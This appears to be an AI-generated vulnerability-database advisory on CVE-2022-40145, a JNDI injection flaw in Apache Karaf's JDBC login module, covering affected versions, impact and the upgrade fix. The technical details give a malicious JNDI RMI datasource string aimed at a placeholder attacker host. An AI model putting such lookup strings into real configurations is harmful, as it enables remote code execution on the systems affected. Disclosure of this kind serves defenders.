Register for the AI for Security Summit: Join Figma, Perplexity & Wiz

CVE-2022-40145
Java vulnerability analysis and mitigation

Overview

Apache Karaf, a modulith runtime supporting various frameworks and programming models, was found to contain a remote code execution vulnerability identified as CVE-2022-40145. The vulnerability was discovered by security researcher Xun Bai and disclosed on December 21, 2022. This security flaw affects all versions of Apache Karaf up to 4.4.1 and 4.3.7, involving potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL (Security Online, Apache Advisory).

Technical details

The vulnerability exists in the jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource method, which uses InitialContext.lookup(jndiName) without proper filtering. An attacker can modify the configuration from options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName()); to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); in JdbcLoginModuleTest#setup. The severity of this vulnerability is rated as Low according to the official advisory (Apache Advisory).

Impact

When successfully exploited, this vulnerability could allow remote attackers to execute arbitrary code on the affected systems when a configuration uses a JNDI LDAP data source URI and the attacker has control of the target LDAP server (Security Online).

Exploitability

The vulnerability can be exploited when an attacker has control of the target LDAP server and can manipulate the JDBC JNDI URL. The exploitation involves modifying the DATASOURCE configuration to point to a malicious JNDI RMI endpoint (Apache Advisory).

Mitigation and workarounds

Apache Karaf users are advised to upgrade to versions 4.3.8 or 4.4.2 or later as soon as possible. Alternatively, users can implement proper path restrictions as a workaround. The fix has been implemented in revision commits 3819f48341 and 2a933445d1 (Apache Advisory).

Additional resources


SourceThis report was generated using AI

Related Java vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2025-53837CRITICAL9.9
  • Java logoJava
  • org.xwiki.rendering:xwiki-rendering-xml
NoYesSep 18, 2026
CVE-2026-77615HIGH8.7
  • JavaScript logoJavaScript
  • paella-core
NoYesSep 17, 2026
CVE-2026-54148HIGH8.1
  • Java logoJava
  • org.http4k:http4k-security-digest
NoYesSep 18, 2026
CVE-2026-85058HIGH7.5
  • Java logoJava
  • io.moquette:moquette-broker
NoYesSep 18, 2026
CVE-2026-54147MEDIUM6.5
  • Java logoJava
  • org.http4k:http4k-security-digest
NoYesSep 18, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management